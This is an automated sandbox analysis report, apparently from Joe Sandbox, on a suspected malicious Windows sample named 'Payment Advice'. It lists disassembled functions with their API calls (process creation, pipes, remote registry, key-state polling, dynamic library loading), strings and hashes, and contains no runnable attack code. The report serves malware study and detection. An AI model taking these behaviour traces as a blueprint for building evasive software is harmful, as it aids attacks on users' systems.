Download Yara Rule

APIs

Part of subcall function 0059D17C: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 0059D1BA
Part of subcall function 0059D17C: GetStockObject.GDI32(00000011), ref: 0059D1CE
Part of subcall function 0059D17C: SendMessageW.USER32(00000000,00000030,00000000), ref: 0059D1D8

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 005E915C
LoadLibraryW.KERNEL32(?), ref: 005E9163
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 005E9178
DestroyWindow.USER32(?), ref: 005E9180

Strings

SysAnimate32, xrefs: 005E9137

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 4caa8fbc6a365f8b908a46c4a2f25d1d3b66cac490b7c4bd59b47029d3f34b9e
Instruction ID: 46219f1a5604d1bf73154ff32f47cc2a1d511a781fc700c8686ff1d4a741a787
Opcode Fuzzy Hash: 4caa8fbc6a365f8b908a46c4a2f25d1d3b66cac490b7c4bd59b47029d3f34b9e
Instruction Fuzzy Hash: 06219F71200286BBEF284E66DC88EFB7BADFF99364F100618F99492190C772DC41E760

Function 005C9568 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 005C9588
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C95B9
GetStdHandle.KERNEL32(0000000C), ref: 005C95CB
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 005C9605

Strings

nul, xrefs: 005C9600

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: c9d7f3c28325d3d3cb27333fb6cdc696256c4d695660dcc6ae8ef9e82d9af718
Instruction ID: 8e00ffa09987865af025f74b21f42784bf6eab0e87c46c05ce117128e936ea76
Opcode Fuzzy Hash: c9d7f3c28325d3d3cb27333fb6cdc696256c4d695660dcc6ae8ef9e82d9af718
Instruction Fuzzy Hash: F6214C71600206AFDB21AFA5DC49F9ABBE8BF85720F204A5DF9A1D72D0D770D941CB50

Function 005C9634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 005C9653
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 005C9683
GetStdHandle.KERNEL32(000000F6), ref: 005C9694
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 005C96CE

Strings

nul, xrefs: 005C96C9

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 66ef8a4b73d7518524a3c744c5a6ea4da6297d8d1797e507630f9130f16974e0
Instruction ID: 092e6b4f3f8af4346e9ae1f784d54b61003169d0037d4233c6411945a3d0db3d
Opcode Fuzzy Hash: 66ef8a4b73d7518524a3c744c5a6ea4da6297d8d1797e507630f9130f16974e0
Instruction Fuzzy Hash: 672130715002469FDB209FA99C49F9ABBE8BF95724F200B1DF9A1D72D0D770D981CB50

Function 005CDAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 005CDB0A
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 005CDB5E
__swprintf.LIBCMT ref: 005CDB77
SetErrorMode.KERNEL32(00000000,00000001,00000000,0061DC00), ref: 005CDBB5

Strings

%lu, xrefs: 005CDB71

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 2557ce28ebbc99e4f97991f974ea550d265c302f9b3cc0d019a74a65a52322f3
Instruction ID: 13a2312c74080dbeb56a203d68aa8a528441aa23dfb201b70f71cf71fe41ee9c
Opcode Fuzzy Hash: 2557ce28ebbc99e4f97991f974ea550d265c302f9b3cc0d019a74a65a52322f3
Instruction Fuzzy Hash: 26218335A00109AFCB10EFA4CD85EAEBFB9FF89704B014069F909E7251DB71EA41CB60

Function 005BC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 005BC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 005BC84A
Part of subcall function 005BC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 005BC85D
Part of subcall function 005BC82D: GetCurrentThreadId.KERNEL32 ref: 005BC864
Part of subcall function 005BC82D: AttachThreadInput.USER32(00000000), ref: 005BC86B

GetFocus.USER32 ref: 005BCA05

Part of subcall function 005BC876: GetParent.USER32(?), ref: 005BC884

GetClassNameW.USER32(?,?,00000100), ref: 005BCA4E
EnumChildWindows.USER32(?,005BCAC4), ref: 005BCA76
__swprintf.LIBCMT ref: 005BCA90

Strings

%s%d, xrefs: 005BCA8A

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
String ID: %s%d
API String ID: 3187004680-1110647743
Opcode ID: 520e4c99642ac8af51c0913a93b3d45306686f16ad4c2f623b34a1c618f4b49d
Instruction ID: a2c1bf62a3963e3f6804b17208ac3e6cd0c474d91ed374b67aa48488f89f85f8
Opcode Fuzzy Hash: 520e4c99642ac8af51c0913a93b3d45306686f16ad4c2f623b34a1c618f4b49d
Instruction Fuzzy Hash: 5211847550020ABBCB11BFA08C89FEA3F7DBF84714F044066FE09AA182DB70A545DB74

Function 005EA409 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 66windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 005EA46D
SendMessageW.USER32(?,00000406,00000000,T.c), ref: 005EA482
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 005EA48F

Strings

msctls_trackbar32, xrefs: 005EA444
T.c, xrefs: 005EA474

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend
String ID: T.c$msctls_trackbar32
API String ID: 3850602802-2216490018
Opcode ID: 1cc3764a0558e2554f8e4e3fd5b7de5d52d1389cfd269fc1cf0eccd446097515
Instruction ID: 81115fb9a71959b6c71d022cc2a76f958d020edf895052bef84bdfdd5aa326c3
Opcode Fuzzy Hash: 1cc3764a0558e2554f8e4e3fd5b7de5d52d1389cfd269fc1cf0eccd446097515
Instruction Fuzzy Hash: 0C110A71250248BEEF245F75CC49FAB7B69FFC9754F014118FA85960D1D6B2E811D720

Function 005A7A94 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

__lock.LIBCMT ref: 005A7AD8

Part of subcall function 005A7CF4: __mtinitlocknum.LIBCMT ref: 005A7D06
Part of subcall function 005A7CF4: EnterCriticalSection.KERNEL32(00000000,?,005A7ADD,0000000D), ref: 005A7D1F

InterlockedIncrement.KERNEL32(?), ref: 005A7AE5
__lock.LIBCMT ref: 005A7AF9
___addlocaleref.LIBCMT ref: 005A7B17

Strings

``, xrefs: 005A7AA3

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: __lock$CriticalEnterIncrementInterlockedSection___addlocaleref__mtinitlocknum
String ID: ``
API String ID: 1687444384-64477630
Opcode ID: e69b0675810b41f08de84f7cecd3d00cc0854fb179313d51caf5a583d336d1c3
Instruction ID: 9f66e569321ec5a0fe724bdd56bceafc10ca77adb520092063ca0f965c18a0a0
Opcode Fuzzy Hash: e69b0675810b41f08de84f7cecd3d00cc0854fb179313d51caf5a583d336d1c3
Instruction Fuzzy Hash: BC015B71544B059ED720DFA5C90A74ABBF0FF95321F20890EA4AA966A0DB70A640CB51

Function 005EE32E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 005EE33D
_memset.LIBCMT ref: 005EE34C
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00643D00,00643D44), ref: 005EE37B
CloseHandle.KERNEL32 ref: 005EE38D

Strings

D=d, xrefs: 005EE346

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID: D=d
API String ID: 3277943733-2833584625
Opcode ID: 40168c675d7850944901fecf52bd4b2a30913abc3bea8f461699468120d4e876
Instruction ID: b4ad1b51635cf6164530a40f68aa04344b17219e79594e76d07e57d131faaf1d
Opcode Fuzzy Hash: 40168c675d7850944901fecf52bd4b2a30913abc3bea8f461699468120d4e876
Instruction Fuzzy Hash: FEF089F59503247FE3101B65AC45F777E6DEF06758F005421FF04D62A2D3755E0046A4

Function 005E1945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 005E19F3
GetProcessIoCounters.KERNEL32(00000000,?), ref: 005E1A26
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 005E1B49
CloseHandle.KERNEL32(?), ref: 005E1BBF

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: d7625a8ef2f4a4653a2f42f68bdabc8b4b8957d9e3267de6bc5c4b94e63a2edb
Instruction ID: bf9f0755119b231bca242b56e9f1420ab9689146dcc71d729a3da7d928540f8d
Opcode Fuzzy Hash: d7625a8ef2f4a4653a2f42f68bdabc8b4b8957d9e3267de6bc5c4b94e63a2edb
Instruction Fuzzy Hash: C8818170600211ABDF14AF65C88ABADBFE6BF44720F148459F905AF382D7B4ED418F94

Function 005EE062 Relevance: 7.7, APIs: 5, Instructions: 187windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 005EE1D5
SendMessageW.USER32(?,000000B0,?,?), ref: 005EE20D
IsDlgButtonChecked.USER32(?,00000001), ref: 005EE248
GetWindowLongW.USER32(?,000000EC), ref: 005EE269
SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 005EE281

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessageSend$ButtonCheckedLongWindow
String ID:
API String ID: 3188977179-0
Opcode ID: c40cbca61fbead4a6e5d1cc25ae4fa11d66ae88fda6551339cd8e5bf1ec91e1b
Instruction ID: a02e6d0e9c3937e5ef270fb270e4b82b36dbe41b52193b58765cda1711b8d0c7
Opcode Fuzzy Hash: c40cbca61fbead4a6e5d1cc25ae4fa11d66ae88fda6551339cd8e5bf1ec91e1b
Instruction Fuzzy Hash: 4A61B434A50284AFDB2DDF55CC56FAA7FBAFB8A300F044059F999972A1C771A980CB11

Function 005C1C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 005C1CB4
VariantClear.OLEAUT32(00000013), ref: 005C1D26
VariantClear.OLEAUT32(00000000), ref: 005C1D81
VariantClear.OLEAUT32(?), ref: 005C1DF8
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 005C1E26

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 4f3abc38a2e7e7dfbe118a574ca26fe58886282dea6d5e436acf2d034cc9743a
Instruction ID: 19960b8e3ac751929fc29e50eb104564086dbd8ec590a9011076fa6585c19f78
Opcode Fuzzy Hash: 4f3abc38a2e7e7dfbe118a574ca26fe58886282dea6d5e436acf2d034cc9743a
Instruction Fuzzy Hash: D9514AB5A00209EFDB14CF98C880EAABBF9FF4D314B158559E95ADB301D330E951CBA4

Function 005E0688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 005E06EE
GetProcAddress.KERNEL32(00000000,?), ref: 005E077D
GetProcAddress.KERNEL32(00000000,00000000), ref: 005E079B
GetProcAddress.KERNEL32(00000000,?), ref: 005E07E1
FreeLibrary.KERNEL32(00000000,00000004), ref: 005E07FB

Part of subcall function 0059E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,005CA574,?,?,00000000,00000008), ref: 0059E675
Part of subcall function 0059E65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,005CA574,?,?,00000000,00000008), ref: 0059E699

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 79fb263483c517ccfc796472f0d81e934d4aa05f3657af66c015a844b62a1982
Instruction ID: 2288f0a0abb593a026925713b1683fee1ee73b7223204732aee0ef62c34e187c
Opcode Fuzzy Hash: 79fb263483c517ccfc796472f0d81e934d4aa05f3657af66c015a844b62a1982
Instruction Fuzzy Hash: D7514B75A00246DFCB04EFA8C885DADBBF5FF98310B048059E956AB392DB70ED45CB90

Function 005E2E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 005E3C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,005E2BB5,?,?), ref: 005E3C1D

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 005E2EEF
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 005E2F2E
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 005E2F75
RegCloseKey.ADVAPI32(?,?), ref: 005E2FA1
RegCloseKey.ADVAPI32(00000000), ref: 005E2FAE

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 3740051246-0
Opcode ID: 6a4c6ef87c213d70b27dc5fb357912134afa02daf210c69f5f2247f5490f76ff
Instruction ID: b541408bcbf65893f80406a8a4708f253dcdfc219dd6a1f1e12425e6d55b0bc4
Opcode Fuzzy Hash: 6a4c6ef87c213d70b27dc5fb357912134afa02daf210c69f5f2247f5490f76ff
Instruction Fuzzy Hash: D2518A71208245AFD704EF64C896E6BBBF9FF88304F04495DF99697291DB30E905CB62

Function 005ECCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fa046fc72c0eb5dc563b76dbfeef0f2b13b4d9483225ab7f5ef17f08af89bf7
Instruction ID: 8ddee8451746808e296bae6c78a00829dff8fc87b3275843e7113ba5d19ea24f
Opcode Fuzzy Hash: 7fa046fc72c0eb5dc563b76dbfeef0f2b13b4d9483225ab7f5ef17f08af89bf7
Instruction Fuzzy Hash: 6B41F7799002D4AFC718DF69CD44FA9BF69FB09310F150265F899A72D1C731ED42C690

Function 005D1206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 005D12B4
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 005D12DD
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 005D131C

Part of subcall function 0058936C: __swprintf.LIBCMT ref: 005893AB
Part of subcall function 0058936C: __itow.LIBCMT ref: 005893DF

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 005D1341
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 005D1349

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: fd6df7937a9968f3c4c47f8befcf5ef26627809e0f961949cd119278ea30e573
Instruction ID: d69be0ac3ba6b52293360cc78a4c8666b15f1bb78315d0b538e2eb23880cc682
Opcode Fuzzy Hash: fd6df7937a9968f3c4c47f8befcf5ef26627809e0f961949cd119278ea30e573
Instruction Fuzzy Hash: A3410B35A00506EFDF01EF64C9859AEBBF5FF48310B148499E90AAB3A2CB31ED01DB50

Function 0059B63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(000000FF), ref: 0059B64F
ScreenToClient.USER32(00000000,000000FF), ref: 0059B66C
GetAsyncKeyState.USER32(00000001), ref: 0059B691
GetAsyncKeyState.USER32(00000002), ref: 0059B69F

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: b57e462504b82f989fc7e6c194f43b2627bf387d1653ae3bd4a5907660d63f23
Instruction ID: 2e08ed3f7894bff487bf29a633bc34c22cd1743e19110740057a269a52e90ad7
Opcode Fuzzy Hash: b57e462504b82f989fc7e6c194f43b2627bf387d1653ae3bd4a5907660d63f23
Instruction Fuzzy Hash: C3418D3150811ABBEF199F64CC48EE9BFB5BB45320F10431AE86992290CB34A994DFA1

Function 005BB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 005BB369
PostMessageW.USER32(?,00000201,00000001), ref: 005BB413
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 005BB41B
PostMessageW.USER32(?,00000202,00000000), ref: 005BB429
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 005BB431

Memory Dump Source

Source File: 00000000.00000002.1639188904.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true

Associated: 00000000.00000002.1639176541.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000060D000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639221649.000000000062E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639251049.000000000063A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1639262321.0000000000644000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_580000_Payment Advice.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
